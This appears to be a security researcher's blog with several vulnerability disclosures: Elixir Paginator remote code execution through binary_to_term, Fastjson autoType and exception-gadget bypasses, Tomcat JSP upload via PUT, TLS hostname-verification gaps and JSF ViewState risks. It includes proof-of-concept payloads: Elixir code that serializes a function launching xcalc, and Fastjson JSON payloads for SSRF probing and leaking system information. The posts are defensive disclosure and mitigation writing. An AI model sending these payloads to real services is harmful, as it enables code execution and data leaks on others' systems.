Alphabot Security Blog

News, analysis and insights

RSS Feed

23 Nov 2020 | Peter Stöckli

Remote code execution in Elixir-based Paginator

Intro

In August of this year I found a remote code execution vulnerability in the Elixir-based Paginator open-source project from Duffel (a UK-based startup in the flight search space). The vulnerability was assigned CVE-2020-15150. Since Duffel seemed to use Paginator for its own REST API, it seems likely that an attacker exploiting this vulnerability would have been able to execute code on Duffel’s (cloud) assets.

Vulnerability

This code execution vulnerability existed due to the use of Erlang’s binary_to_term in combination with untrusted user data. This function is much more dangerous when used in Elixir.

The vulnerability could have been triggered via Paginator’s user-provided before/after cursors, as seen in Duffel’s pagination API:

Duffel's Pagination REST API

The string g2wAAAACbQAAABBBZXJvbWlzdC1LaGFya2l2bQAAAB= is a Base64-encoded, binary-serialized Erlang term (External Term Format, ETF). Such an Erlang term can contain anything from simple string values to full-blown functions containing almost any code you’d like. In plain Erlang, a function provided in such a payload would not be executed automatically (at least as long as nobody explicitly calls it). In Elixir, however, there’s a much higher chance that such a function is executed later down the road, thanks to Elixir’s Enumerable protocol.

Exploits

To demonstrate this vulnerability I created two exploits. The first one starts xcalc:

defp rce_start_xcalc() do
  # Anonymous function that starts xcalc when invoked as a reducer
  exploit = fn _, _ -> System.cmd("xcalc", []); {:cont, []} end

  # Serialize the function and Base64-encode it (same format as Paginator's cursors)
  exploit
  |> :erlang.term_to_binary()
  |> Base.url_encode64()
end

The second one prints the stacktrace (so we see where our anonymous function has been triggered):

defp rce_print_stacktrace() do
  # Anonymous function that prints the current stacktrace when invoked as a reducer
  exploit = fn _, _ ->
    IO.inspect(Process.info(self(), :current_stacktrace), label: "RCE STACKTRACE")
    {:cont, []}
  end

  # Serialize the function and Base64-encode it (same format as Paginator's cursors)
  exploit
  |> :erlang.term_to_binary()
  |> Base.url_encode64()
end

The functions above create a Base64-encoded exploit payload (in the same format as the cursors used by Paginator). However, instead of cursor position information, the payload contains an anonymous function that we want the server to execute. (An attacker would run these functions on their own machine, providing only the Base64-encoded payload to an API that uses Duffel’s Paginator.)

The stacktrace output of the second exploit payload looked like this (when executed from a unit test):

......RCE STACKTRACE: {:current_stacktrace,
[
{Process, :info, 2, [file: 'lib/process.ex', line: 767]},
{PaginatorTest, :"-rce_print_stacktrace/0-fun-0-", 2,
    [file: 'test/paginator_test.exs', line: 945]},
{Stream, :do_zip_next_tuple, 5, [file: 'lib/stream.ex', line: 1191]},
{Stream, :do_zip, 3, [file: 'lib/stream.ex', line: 1168]},
{Enum, :zip, 1, [file: 'lib/enum.ex', line: 2820]},
{Paginator.Ecto.Query, :filter_values, 4,
    [file: 'lib/paginator/ecto/query.ex', line: 43]},
{Paginator.Ecto.Query, :maybe_where, 2,
    [file: 'lib/paginator/ecto/query.ex', line: 103]},
{Paginator.Ecto.Query, :paginate, 2,
    [file: 'lib/paginator/ecto/query.ex', line: 12]},
{Paginator, :entries, 4, [file: 'lib/paginator.ex', line: 325]},
{Paginator, :paginate, 4, [file: 'lib/paginator.ex', line: 180]},
{PaginatorTest,
    :"test paginate a collection of payments, sorting by charged_at sorts ascending with before cursor",
    1, [file: 'test/paginator_test.exs', line: 78]},
{ExUnit.Runner, :exec_test, 1, [file: 'lib/ex_unit/runner.ex', line: 355]},
{:timer, :tc, 1, [file: 'timer.erl', line: 166]},
{ExUnit.Runner, :"-spawn_test_monitor/4-fun-1-", 4,
    [file: 'lib/ex_unit/runner.ex', line: 306]}
]}

This stacktrace reveals that the exploit function was triggered on line 43 of query.ex by the function Enum.zip: our anonymous function is implicitly called by Elixir (thanks to the Enumerable protocol).

Additional information

This is not the first time a vulnerability caused by the use of binary_to_term in combination with untrusted data has been found. Griffin Byatt probably discovered the first publicly known instance: code execution through the session cookie in the popular and widely used Elixir Plug library.

The Security Working Group of the Erlang Ecosystem Foundation has some recommendations regarding Serialisation and deserialisation including recommendations for mitigations.

Warning
The official Erlang documentation does "warn" about binary_to_term/1 and recommends binary_to_term/2. However, using binary_to_term/2 is no protection against the code execution shown here (especially not in Elixir). In fact, the Paginator library used binary_to_term/2 with the safe option. Using binary_to_term/2 with the safe option only protects against certain denial-of-service attacks (such as atom-table exhaustion).

Thanks

Thanks are in order for Duffel (the maintainers of this project):

  • Firstly: Duffel fixed the vulnerability in less than one day and acted very professionally throughout the process.
  • Secondly: Despite not having a bug bounty program, Duffel paid a bounty of 1000 GBP, part of which I donated to a fund providing help for victims of the port explosion in Beirut, Lebanon.

15 Jul 2020 | Peter Stöckli

Fastjson: exceptional deserialization vulnerabilities

Intro

Many of you may never have heard of the Java-based JSON serialization library called Fastjson, although it’s quite an interesting piece of software. Fastjson is an open source project of the Chinese Internet giant Alibaba and has 22,000 stars on GitHub (and, coincidentally, 1337 open issues) at the time of writing of this blog post.

Fastjson on GitHub with 1337 open issues

Like Jackson(-Databind) and other JSON serialization libraries, Fastjson comes with a so-called AutoType feature, which instructs the library to deserialize JSON input using types provided in the JSON itself (via an extra JSON field called @type). We have known at least since Muñoz/Mirosh’s Friday-The-13th-JSON-Attacks and Bechler’s marshalsec that deserializing any input whose types can be provided by the sender is potentially insecure and dangerous, especially if the types can be provided by a remote user (e.g. in a JSON object or a ViewState). Since the Fastjson developers are aware of this, autoType isn’t enabled by default. And even if it is enabled by the developer using the library, an ever-growing deny list of types is at play.

The Fastjson deny lists

Fastjson maintains deny lists to prevent classes that could potentially lead to RCE from being instantiated (so-called gadgets). To achieve this an array called denyHashCodes is maintained containing the hashes of forbidden packages and class names.

For example, 0xC00BE1DEBAF2808BL is the hash for "jdk.internal.".

The hash function in use (TypeUtils#fnv1a_64) is a 64-bit flavor of the FNV-1a non-cryptographic hash function. The reason for this hash-based deny list seems to be some kind of security-by-obscurity game.
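For reference, 64-bit FNV-1a is tiny. The sketch below is a from-scratch implementation using the standard parameters (offset basis 0xcbf29ce484222325, multiplier prime 0x100000001b3); this is what TypeUtils#fnv1a_64 amounts to for plain ASCII names, though it is not Fastjson’s actual code and exact parity is not guaranteed:

```java
public class Fnv1a64 {
    // Standard 64-bit FNV-1a parameters
    private static final long OFFSET_BASIS = 0xcbf29ce484222325L;
    private static final long PRIME = 0x100000001b3L;

    // XOR each character into the hash, then multiply by the FNV prime.
    static long fnv1a64(String input) {
        long hash = OFFSET_BASIS;
        for (int i = 0; i < input.length(); i++) {
            hash ^= input.charAt(i);
            hash *= PRIME;
        }
        return hash;
    }

    public static void main(String[] args) {
        // If this matches Fastjson's variant exactly, hashing "jdk.internal."
        // should reproduce the deny-list constant quoted above.
        System.out.println(Long.toHexString(fnv1a64("jdk.internal.")));
    }
}
```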

The unrelated GitHub project called fastjson-blacklist contains a list with many of the hashes and their effective package or class name and a corresponding BreakerUtil.

Fun fact: Arrays.binarySearch is used to check the denyList for the hash of the type name, but that list is only programmatically sorted in some cases. This means the developers of Fastjson have to be extra careful when adding new entries to the denyList, because they could render parts of it useless. (Hint: binarySearch requires a sorted array to work as intended.)
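The pitfall is easy to demonstrate with a toy deny list (the values below are hypothetical, not Fastjson’s real hashes): if the array is not sorted, Arrays.binarySearch can miss an entry that is present.

```java
import java.util.Arrays;

public class UnsortedDenyList {
    public static void main(String[] args) {
        // A toy "deny list" that is NOT sorted (hypothetical values).
        long[] denyList = {30L, 10L, 20L};

        // 30 is present at index 0, but binary search compares against the
        // middle element (10), discards the left half, and never sees it.
        int result = Arrays.binarySearch(denyList, 30L);
        System.out.println(result); // negative => "not found": entry silently ignored

        // After sorting, the same lookup succeeds.
        Arrays.sort(denyList);
        System.out.println(Arrays.binarySearch(denyList, 30L)); // index 2
    }
}
```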

Typical Fastjson RCEs (using the autoType-feature)

Needless to say, new classes that can cause some kind of RCE are discovered all the time, which leads to the extension of the deny list and the release of a new version of Fastjson (a path similar to the one Jackson-Databind had taken before they replaced their deny list with an allow list).

An example of such a gadget is the JDK class javax.swing.JEditorPane, which worked until Fastjson 1.2.68 (released in March 2020). It can be used for remote detection of older Fastjson versions with autoType enabled, or alternatively to exploit a blind SSRF vulnerability.

A simple payload using that gadget would look like this:

{"@type":"javax.swing.JEditorPane","page": "https://sectests.net/canary/sample"}

If a Fastjson version before 1.2.69 with autoType enabled is in use and the payload above is parsed, it instantiates the JDK class javax.swing.JEditorPane and calls its setPage method, which in turn makes a simple HTTP GET request to the specified URL. (As said before, this gadget is mostly interesting for the remote detection of a vulnerable application using Fastjson.)
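Conceptually, type-driven deserialization of such a payload boils down to reflection: take the class name from @type, load it, instantiate it, and invoke the setter matching each remaining JSON field. The sketch below is a simplified illustration of that pattern (not Fastjson’s actual code), using the harmless java.util.Date as a stand-in for a gadget like JEditorPane:

```java
import java.lang.reflect.Method;

public class AutoTypeSketch {
    // Simplified: instantiate the class named by "@type" and call one setter.
    // A real deserializer does this for every field in the JSON object.
    static Object instantiateAndSet(String typeName, String property, Object value)
            throws Exception {
        Class<?> clazz = Class.forName(typeName);               // the "@type" value
        Object instance = clazz.getDeclaredConstructor().newInstance();
        String setter = "set" + Character.toUpperCase(property.charAt(0))
                + property.substring(1);
        for (Method m : clazz.getMethods()) {
            if (m.getName().equals(setter) && m.getParameterCount() == 1) {
                m.invoke(instance, value);  // e.g. JEditorPane.setPage(url) -> HTTP GET
                break;
            }
        }
        return instance;
    }

    public static void main(String[] args) throws Exception {
        // Harmless demonstration: "time" -> setTime(long) on java.util.Date.
        Object obj = instantiateAndSet("java.util.Date", "time", 1000L);
        System.out.println(obj.getClass().getName());
    }
}
```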

Now it gets interesting…

Most people that know of the dangers of deserialization vulnerabilities won’t be surprised so far. However, while looking at the library I found some interesting things:

The global Fastjson instance

One of these interesting things is that there is a global Fastjson instance whose serialization settings can be changed. So it might happen that one developer enables the autoType feature on the global instance to store some serialized values in a Redis datastore (which in itself is not that dangerous yet):

ParserConfig.getGlobalInstance().setAutoTypeSupport(true);

while in another part of the same codebase another developer parses JSON from a remote data source using the same global instance. And so a new RCE is created:

JSON.parse(payload);

It looks so harmless, doesn’t it?

How many autoType checks?

In Fastjson 1.2.70 the JSONException with the message "autoType is not support." (sic) is thrown in nine different places in the ParserConfig class. One could argue about why the authors deem this necessary. In my simplified, naïve view of the world I would expect a single place in the code where such an exception is thrown (“No really, autoType is not supported, we won’t instantiate your stupid class.”). End of discussion. But in this library there are nine of these autoType checks, enabling people to find all kinds of unintended bypasses.

But can you make an Exception (instance), please?

So, let’s assume we have autoType disabled. Nine different checks should be enough, right?

Well…

In May 2020 someone discovered that despite autoType being disabled it was possible to instantiate Exceptions… and leak some data using them. Let’s look at how that was possible:

Just because autoType was not enabled didn’t mean that no classes could be instantiated; it just meant you couldn’t instantiate most classes…

Create Exception - Debugger

So, with a simplified payload like:

{"@type":"java.lang.Exception","@type":"java.lang.RuntimeException"}

it was possible to instantiate a simple RuntimeException, despite autoType being disabled.

When we look at what happens after we call parse on the com.alibaba.fastjson.JSON class, we see the following behavior: at some point both of our types, java.lang.Exception and java.lang.RuntimeException, have to go through checkAutoType in the ParserConfig class. That method is over 200(!) lines long and checks, among other things:

  • whether safeMode is enabled (it is not)
  • whether the type name is shorter or equal to 192 chars and at least 3 characters long
  • whether the fnv1a_64-hash of our type name is in the INTERNAL_WHITELIST_HASHCODES array (it is not)
  • whether the fnv1a_64-hash of our type name is in the internalDenyHashCodes array (it is not)
  • Depending on which configuration flags were enabled it would also check against denyHashCodes array

Remember: These steps above happen, despite not having autoType enabled.

Going forward, the createException method of the ThrowableDeserializer class tries to instantiate the exception using three different constructors, in this order:

// 1. Prefer a (String message, Throwable cause) constructor
if (causeConstructor != null) {
	return (Throwable) causeConstructor.newInstance(message, cause);
}

// 2. Fall back to a (String message) constructor
if (messageConstructor != null) {
	return (Throwable) messageConstructor.newInstance(message);
}

// 3. Last resort: the no-arg constructor
if (defaultConstructor != null) {
	return (Throwable) defaultConstructor.newInstance();
}

In the end we have an instantiated exception on which we can call getters and setters.
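The effect can be reproduced with plain reflection. The sketch below is a minimal illustration of what ThrowableDeserializer ends up doing (not its actual code): resolve the exception class by name, pick its message constructor, invoke it, and call getters on the fresh instance:

```java
import java.lang.reflect.Constructor;

public class ExceptionGadgetSketch {
    // Instantiate an arbitrary Throwable subclass by name, as the
    // {"@type":"java.lang.Exception", ...} payload ultimately causes Fastjson to do.
    static Throwable create(String className, String message) throws Exception {
        Class<?> clazz = Class.forName(className);
        Constructor<?> ctor = clazz.getConstructor(String.class); // message constructor
        return (Throwable) ctor.newInstance(message);
    }

    public static void main(String[] args) throws Exception {
        Throwable t = create("java.lang.RuntimeException", "instantiated via reflection");
        // Getters on the instance are now callable -- this is what the $ref
        // trick exploits to leak data (e.g. getMessage, getStackTrace).
        System.out.println(t.getClass().getName() + ": " + t.getMessage());
    }
}
```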

The Selenium gadget

Another exception gadget payload, which can be found in the learnjavabug GitHub repository of threedr3am, uses the WebDriverException of Selenium. This payload could be used to leak some system information, but not that easily: first, it needs a web application that somehow reflects the input data, and second, it requires Selenium on the classpath, which should rarely be the case. (Selenium is mostly used for integration tests and should only be on the classpath used for testing.)

A simple version of that payload looks like this (note the $ref):

{"content": {"$ref":"$x.systemInformation"}, "x": {"@type":"java.lang.Exception","@type":"org.openqa.selenium.WebDriverException"}}

If the web application reflects the value of the content property somewhere, system information such as the following could be “leaked”:

host: 'detonation-chamber-20', ip: '127.0.1.1', os.name: 'Linux', os.arch: 'amd64', os.version: '5.4.0-40-generic', java.version: '11.0.7'

Not terribly sensitive information, to be honest, but it might be useful if you want to detect whether older versions of Fastjson are in use (it requires the vulnerable web application to have Selenium on its classpath).

Searching for more gadgets using CodeQL and LGTM

Instead of searching for vulnerabilities with GitHub Security Lab’s amazing CodeQL, I thought it would be interesting to leverage CodeQL on LGTM as a tool to find additional Exception gadgets, using a query similar to this:

import java

from Class clazz, Method method
where
  clazz.getASourceSupertype*() instanceof TypeException and
  method = clazz.getAMethod() and
  method.getName().matches("get%")
  // and ...
select clazz, method

I ran an extended version of this query against some popular Java libraries but did not find any interesting gadgets (given the nature of these gadgets, this was expected). However, CodeQL in combination with LGTM is definitely a comfortable way of searching for gadget candidates.

Detection with a simple gadget

It turns out that for detection it might be enough to misuse the getStackTrace method implemented on Throwable. In that case any exception that inherits from Throwable would do (e.g. java.lang.RuntimeException):

{"content": {"$ref":"$x.stackTrace"}, "x": {"@type":"java.lang.Exception","@type":"java.lang.RuntimeException"}}

This detection method also requires that an attribute (like content) is reflected somewhere.

The safe mode

With version 1.2.68 the Fastjson developers introduced the so-called safe mode. One way to turn on safe mode is to call setSafeMode with true on the global config instance:

ParserConfig.getGlobalInstance().setSafeMode(true);

The check for the safe mode flag takes place almost at the top of the already mentioned checkAutoType method in the ParserConfig class and throws an exception when Fastjson wants to instantiate an arbitrary type. However, safe mode is not enabled by default…

Closing thoughts

Basically, Fastjson looks like a gift to the information security world that will keep on giving.

I didn’t even have the time to look into other interesting features of Fastjson, like references or the JSONPath/regex support, so there’s probably much more interesting stuff hiding in there. While Fastjson might seem like an extremely powerful library, it’s probably too powerful for its own good (or at least for the developers using it).

Should you use this library for handling user input? Probably not. Consider using a JSON library with fewer features that prevents you from shooting yourself in the foot, like Gson.

06 Jan 2020 | Peter Stöckli

Your Java builds might break starting January 13th (if you haven't yet switched repo access to HTTPS)

Summary

This blog post is a reminder that you should make sure that all your builds in the Java ecosystem access the artifact repositories (e.g. Maven Central) via HTTPS instead of HTTP. This often just means replacing ‘http:’ with ‘https:’ in the repository URLs in your build files (e.g. build.gradle, build.sbt, pom.xml) or on your own artifact servers.
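For example, in a Maven pom.xml the change is a single character (the repository id below is just a common convention; check your own build files for the URLs they actually use):

```xml
<!-- before: artifacts fetched over plain HTTP (open to MITM tampering) -->
<repository>
  <id>central</id>
  <url>http://repo1.maven.org/maven2</url>
</repository>

<!-- after: the same repository, fetched over HTTPS -->
<repository>
  <id>central</id>
  <url>https://repo1.maven.org/maven2</url>
</repository>
```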

Your Java builds might break starting January 13th (no more repo access via HTTP)

It is a long-known fact that downloading Java artifacts via HTTP has inherent security risks which might put your company, customers or users at risk.

This is why in 2019 Jonathan Leitschuh of Gradle started an initiative to disable HTTP access to artifact servers in a coordinated way. He posted an update on the state of the initiative in January.

On January 13th 2020 HTTP access to JCenter will be disabled, the other repositories like Maven Central will follow on January 15th. This means that you should make sure that your builds only access the artifact repositories via HTTPS or else they might stop working. Hopefully, you switched your builds already a long time ago and don’t need to do anything.

Artifact repositories that will disable HTTP access

This is a non-exhaustive list of artifact repositories that will disable HTTP access (compiled from this Gist). It contains links to the individual announcements in case you missed them. In any case, it is better to switch all artifact repository access to HTTPS than to rely on this list.

JCenter (JFrog Bintray)

HTTP disabled on January 13th, 2020
Affected Repo URL(s) http://jcenter.bintray.com
Announcement Secure JCenter with HTTPS

Maven Central

HTTP disabled on January 15th, 2020
Affected Repo URL(s) http://repo1.maven.org, http://repo.maven.apache.org
Announcement HTTP access to repo1.maven.org and repo.maven.apache.org is being deprecated

Spring (Pivotal)

HTTP disabled on January 15th, 2020
Affected Repo URL(s) http://repo.spring.io
Announcement Goodbye http://repo.spring (use https)

Gradle

HTTP disabled on January 15th, 2020
Affected Repo URL(s) http://repo.gradle.org, …
Announcement Decommissioning HTTP for Gradle Services

Conclusion

Switching artifact repositories to HTTPS-only is a good thing for the Java ecosystem, but it is still not enough… It might be a wake-up call for some to think about supply chain security in the world of software. Modern builds in most languages fetch myriads of direct and transitive dependencies, be it only for building and testing, or be it for delivering them as part of your product to a customer. Fetching dependencies over HTTPS mitigates potential man-in-the-middle (MITM) attacks, but it does not solve integrity or authenticity issues:

  • Who assembled the artifacts I’m using?
  • Are updates to the artifacts created by the same developer as previous ones?
  • Are the contents of the fetched artifacts always the same for the same version?

These are issues which can only be solved by verifying the signatures of the artifacts and by checking the cryptographic hashes of the downloaded artifacts. Luckily, the Gradle team is working on these issues.

Update (11 Jan 2020)

Added link to initiative update.

03 Dec 2018 | Peter Stöckli

Missing TLS hostname verification in multiple Java libraries

Summary

Alphabot Security has looked at a bunch of popular Java communication libraries to check whether they verify that the hostname of the server they connect to is valid for the presented certificate.

The following Java libraries with missing hostname verification were found (details below):

The Vulnerability

Improper Validation of Certificate with Host Mismatch (CWE-297) is described as follows:

The software communicates with a host that provides a certificate, but the software does not properly ensure that the certificate is actually associated with that host. Even if a certificate is well-formed, signed, and follows the chain of trust, it may simply be a valid certificate for a different site than the site that the software is interacting with.
If the certificate's host-specific data is not properly checked - [..] - it may be possible for a redirection or spoofing attack to allow a malicious host with a valid certificate to provide data, impersonating a trusted host. In order to ensure data integrity, the certificate must be valid and it must pertain to the site that is being accessed.

Unfortunately, this kind of vulnerability is very common in the Java world, since certificate verification and hostname verification are treated as two separate concerns, when in practice some sort of hostname verification is necessary to prevent MITM attacks on all sorts of protocols conveyed via TLS (e.g. see RFC 2818, HTTP Over TLS).

Google provides some good documentation regarding Java and hostname verification with a focus on Android apps, including following warning:

Caution: SSLSocket does not perform hostname verification. It is up to your app to do its own hostname verification, preferably by calling getDefaultHostnameVerifier() with the expected hostname. Further beware that HostnameVerifier.verify() doesn't throw an exception on error but instead returns a boolean result that you must explicitly check.

Since Java 7 there’s another way of setting up hostname verification for libraries that require HTTPS-style hostname verification: calling setEndpointIdentificationAlgorithm with the string value "HTTPS" on the SSLParameters of the SSLSocket:

sslParams.setEndpointIdentificationAlgorithm("HTTPS");

Important: If you use SSLContexts in your code always write tests that ensure that hostname verification works as expected.
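A slightly fuller sketch of that call in context (the socket here is created but deliberately never connected, so no host name appears):

```java
import javax.net.ssl.SSLParameters;
import javax.net.ssl.SSLSocket;
import javax.net.ssl.SSLSocketFactory;

public class HostnameVerificationExample {
    public static void main(String[] args) throws Exception {
        SSLSocketFactory factory = (SSLSocketFactory) SSLSocketFactory.getDefault();
        // Create an unconnected SSLSocket just to show the configuration step.
        try (SSLSocket socket = (SSLSocket) factory.createSocket()) {
            SSLParameters sslParams = socket.getSSLParameters();
            // Without this call the socket validates the certificate chain,
            // but NOT whether the certificate actually matches the host name.
            sslParams.setEndpointIdentificationAlgorithm("HTTPS");
            socket.setSSLParameters(sslParams);
            System.out.println(socket.getSSLParameters()
                    .getEndpointIdentificationAlgorithm()); // HTTPS
        }
    }
}
```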

The suboptimal Java API is often mirrored by the libraries that use it, so that the user of the library has to set up hostname verification themselves. In our opinion, the sensible thing for a library to do is to be secure by default, while allowing the user to turn off security features they deem unnecessary in their specific case.

Spring RabbitMQ Java Client

CVE: CVE-2018-11087

The Spring RabbitMQ Java Client (also known as Spring-AMQP) uses the official RabbitMQ Java Client to connect to RabbitMQ. The official rabbitmq-java-client had a suboptimal API which only allowed enabling hostname verification by providing one’s own SSLContext. In the library’s defense, it has JavaDoc on methods like useSslProtocol() that states:

not recommended to use in production as it provides no protection against man-in-the-middle attacks.

However, the Spring RabbitMQ Java Client did not provide its own SSLContext and was therefore never protected against MITM attacks.

The rabbitmq-java-client has since implemented the method enableHostnameVerification(), which makes it easier to enable hostname verification.

The mitigation as described in the advisory:

  • Upgrade to the 1.7.10.RELEASE or 2.0.6.RELEASE and set the enableHostnameValidation property to true. Override the transitive amqp-client version to at least 4.8.0 and 5.4.0, respectively
  • The upcoming 2.1.0.RELEASE will set the property to true by default.
  • If you are using the amqp-client library directly to create a connection factory, refer to its javadocs for the enableHostnameValidation() method.

Apache ActiveMQ Client (CVE-2018-11775)

CVE: CVE-2018-11775

The Apache ActiveMQ Client simply did not perform hostname verification. This was fixed in Apache ActiveMQ 5.15.6, which enables hostname verification by default. So if you’re connecting to Amazon MQ or a similar service using the ActiveMQ Client, you should upgrade to version 5.15.6 or later.

Jetty WebSocket Client

The Jetty WebSocket client before 9.4.12 was configured with an SslContextFactory that was potentially initialized without hostname verification.

The JettyWebSocketClient class of the Spring Framework, which uses the Jetty WebSocket client underneath, did not configure a different SslContextFactory of its own.

Since version 9.4.12 Jetty does provide an SslContextFactory with TLS hostname verification enabled.

Users of the Spring Framework that use the JettyWebSocketClient should upgrade to a framework version that pulls in Jetty 9.4.12 or later. If you are stuck on an older version of the Jetty WebSocket client, you have to explicitly configure the SslContextFactory to get TLS hostname verification.

Final Thoughts

  • While TLS hostname verification is surely not at the top of everyone's agenda, it's still important that communication libraries perform it by default, because otherwise it can undermine the benefits of using TLS and give a false sense of security.
  • There are probably even more libraries in the Java world and in other ecosystems that don't perform TLS hostname verification by default.
  • A shout-out to both the Apache Foundation and Pivotal (the company behind Spring). Both seem to have nice vulnerability management processes at work.

23 Jul 2018 | Peter Stöckli

Apache Tomcat user session mix up and DoS

General

On July 22nd the Apache Tomcat team released more information about three security vulnerabilities worth mentioning, all of which had already been fixed in previous patch releases. The three vulnerabilities are covered below.

The vulnerabilities affect the Tomcat 7.0.x, 8.5.x and 9.0.x lines. (Older versions of Tomcat, e.g. 6.0.x and older, are EOL (end of life); the Tomcat 8.0.x line is also EOL.) Please note that there are lots of other products and projects based on Tomcat (e.g. TomEE) that might also be affected.

User sessions can get mixed up

CVE: CVE-2018-8037

Affected versions:

  • Tomcat 9.0.0.M9 to 9.0.9
  • Tomcat 8.5.5 to 8.5.31

As it reads in the security announcement:

A bug in the tracking of connection closures can lead to reuse of user sessions
in a new connection.

This was initially reported as “User session are mixed up after internal exceptions” by a JetBrains employee:

We faced an issue when one user became logged in as another one.
I suppose that Tomcat may mix up responses and return session cookie
to the wrong request.

It seems that it may be related to the following errors occured at the same time:

java.lang.NullPointerException
[..]

It is not yet entirely clear what triggers this potentially grave vulnerability in the NIO and NIO2 connectors. According to the reporter it was accompanied by several exceptions occurring in the same time frame.

Denial Of Service (DoS) via UTF-8 decoder

CVE: CVE-2018-1336

Affected versions:

  • Tomcat 9.0.0.M9 to 9.0.7
  • Tomcat 8.5.0 to 8.5.30
  • Tomcat 8.0.0.RC1 to 8.0.51
  • Tomcat 7.0.28 to 7.0.86

As it reads in the security announcement:

An improper handling of overflow in the UTF-8 decoder with supplementary characters
can lead to an infinite loop in the decoder causing a Denial of Service.

Tomcat uses the UTF-8 decoder of the late Apache Harmony project; that decoder has an unhandled edge case (a.k.a. a bug) which can lead to an infinite loop while trying to decode UTF-8 encoded characters.

No host name verification in WebSocket client

CVE: CVE-2018-8034

Affected versions:

  • Tomcat 9.0.0.M1 to 9.0.9
  • Tomcat 8.5.0 to 8.5.31
  • Tomcat 8.0.0.RC1 to 8.0.52
  • Tomcat 7.0.35 to 7.0.88

Lastly, the WebSocket client did not verify that the hostname in the TLS certificate matched the actual hostname of the remote host.

Final Thoughts

If you are a user of Apache Tomcat it is recommended to subscribe to the official tomcat-announce mailing list to get information about new releases and security vulnerabilities directly from the Tomcat team.

We recommend updating your Tomcat installations each time a new Tomcat patch release is announced.

03 Oct 2017 | Peter Stöckli

Apache Tomcat RCE if readonly set to false (CVE-2017-12617)

The Vulnerability

The Apache Tomcat team announced today that all Tomcat versions before 9.0.1 (beta), 8.5.23, 8.0.47 and 7.0.82 contain a potentially dangerous remote code execution (RCE) vulnerability on all operating systems if the default servlet is configured with the parameter readonly set to false, or if the WebDAV servlet is enabled with its readonly parameter set to false. This configuration allows any unauthenticated user to upload files (as used in WebDAV). It was discovered that the filter preventing the upload of JavaServer Pages (.jsp) can be circumvented, so JSPs can be uploaded and then executed on the server.

Now since this feature is typically not wanted, most publicly exposed systems won’t have readonly set to false.

This security issue (CVE-2017-12617) was discovered after a similar vulnerability in Tomcat 7 on Windows (CVE-2017-12615) had been fixed. Unfortunately, it was publicly disclosed in the Tomcat bug tracker on the 20th of September.

Updating Tomcat to a version where the vulnerability is fixed is recommended in all cases.
(The setting could be enabled by accident or other vulnerable combinations could be discovered.)

Part of the original announcement:

CVE-2017-12617 Apache Tomcat Remote Code Execution via JSP Upload

Severity: Important

Versions Affected:
Apache Tomcat 9.0.0.M1 to 9.0.0
Apache Tomcat 8.5.0 to 8.5.22
Apache Tomcat 8.0.0.RC1 to 8.0.46
Apache Tomcat 7.0.0 to 7.0.81

Description:
When running with HTTP PUTs enabled (e.g. via setting the readonly
initialisation parameter of the Default servlet to false) it was
possible to upload a JSP file to the server via a specially crafted
request. This JSP could then be requested and any code it contained
would be executed by the server.

Mitigation:
Users of the affected versions should apply one of the following
mitigations:
- Upgrade to Apache Tomcat 9.0.1 or later
- Upgrade to Apache Tomcat 8.5.23 or later
- Upgrade to Apache Tomcat 8.0.47 or later
- Upgrade to Apache Tomcat 7.0.82 or later

Credit:
This issue was first reported publicly followed by multiple reports to
the Apache Tomcat Security Team.

History:
2017-10-03 Original advisory

The Exploit

The publicly described exploit is as simple as sending a specially crafted HTTP PUT request with a JSP as payload to a Tomcat server.

The code is then executed when the newly uploaded JSP is accessed via an HTTP client (e.g. a web browser):

Uploaded JSP executed on the server

The Misconfiguration

The misconfiguration in the default servlet can be spotted by checking if the web.xml of the default servlet contains an init-param like this (typically there are other init-params set):

    <init-param>
        <param-name>readonly</param-name>
        <param-value>false</param-value>
    </init-param>

Please note that the misconfiguration could also occur in code or in the configuration of the WebDAV servlet (if enabled).

The documentation of the default servlet describes the readonly param like this:

Is this context "read only", so HTTP commands like PUT and DELETE are rejected? [true]

Since this sentence does not mention the dangers of this param, we suggested a change to said documentation.

The Mitigation

Updating Tomcat to a version where the vulnerability is fixed (e.g. Tomcat 8.5.23) is recommended.

The readonly init-param shouldn’t be set to false. If this param is left at its default (true), an attacker is not able to upload files.

On this occasion it’s also a good idea to make sure that you don’t have the same vulnerability in custom PUT implementations (also see: Unrestricted File Upload).

Additionally, it’s of course also possible to block PUT and DELETE requests on the frontend server (e.g. on the Web Application Firewall (WAF)).

Final Thoughts

In our eyes it is almost always wrong to set readonly to false, and hopefully most publicly accessible Tomcat servers don’t have it set to false anyway.

If you are a user of Apache Tomcat it is recommended to subscribe to the tomcat-announce mailing list to get information about new releases and security vulnerabilities directly from the Tomcat team.

Update for developers (04 Oct 2017)

On some sites on the Internet (e.g. on Stack Overflow) you find the information that you should set readonly to false to make your custom servlet accept PUT or DELETE requests. That is simply wrong!

Update (05 Oct 2017)

Updated the blog post to better point out that an upgrade to a fixed Tomcat version is (of course) recommended. Added the original announcement.

Update (09 Oct 2017)

Extended Mitigation chapter, improved wording.


14 Aug 2017 | Peter Stöckli

Misconfigured JSF ViewStates can lead to severe RCE vulnerabilities

tl;dr ViewStates in JSF are serialized Java objects. If the used JSF implementation in a web application is not configured to encrypt the ViewState the web application may have a serious remote code execution (RCE) vulnerability. So it is important that the ViewState encryption is never disabled!

Intro

After we had a look at RCEs through misconfigured JSON libraries we started analyzing the ViewStates of JSF implementations. JavaServer Faces (JSF) is a User Interface (UI) technology for building web UIs with reusable components. JSF is mostly used for enterprise applications and a JSF implementation is typically used by a web application that runs on a Java application server like JBoss EAP or WebLogic Server. There are two well-known implementations of the JSF specification:

  • Oracle Mojarra (JSF reference implementation)
  • Apache MyFaces

Scope

This blog post focuses on the two JSF 2.x implementations: Oracle Mojarra (Reference Implementation) and Apache MyFaces. Older implementations (JSF 1.x) are also likely to be affected by the vulnerabilities described in this post. (JSF 2.0.x was initially released in 2009, the current version is 2.3.x).

The state of the ViewState

A difference between JSF and similar web technologies is that JSF makes use of ViewStates (in addition to sessions) to store the current state of the view (e.g. what parts of the view should currently be displayed). The ViewState can be stored on the server or the client. JSF ViewStates are typically automatically embedded into HTML forms as a hidden field with the name javax.faces.ViewState. They are sent back to the server if the form is submitted.

Server-side ViewState

If the JSF ViewState is configured to sit on the server the hidden javax.faces.ViewState field contains an id that helps the server to retrieve the correct state. In the case of MyFaces that id is a serialized Java object!

Client-side ViewState

If the JSF ViewState is configured to sit on the client the hidden javax.faces.ViewState field contains a serialized Java object that is at least Base64 encoded. You might have realized by now that this is a potential road to disaster! That might be one of the reasons why nowadays JSF ViewStates are encrypted and signed before being sent to the client.

The dangers of serialized Java objects

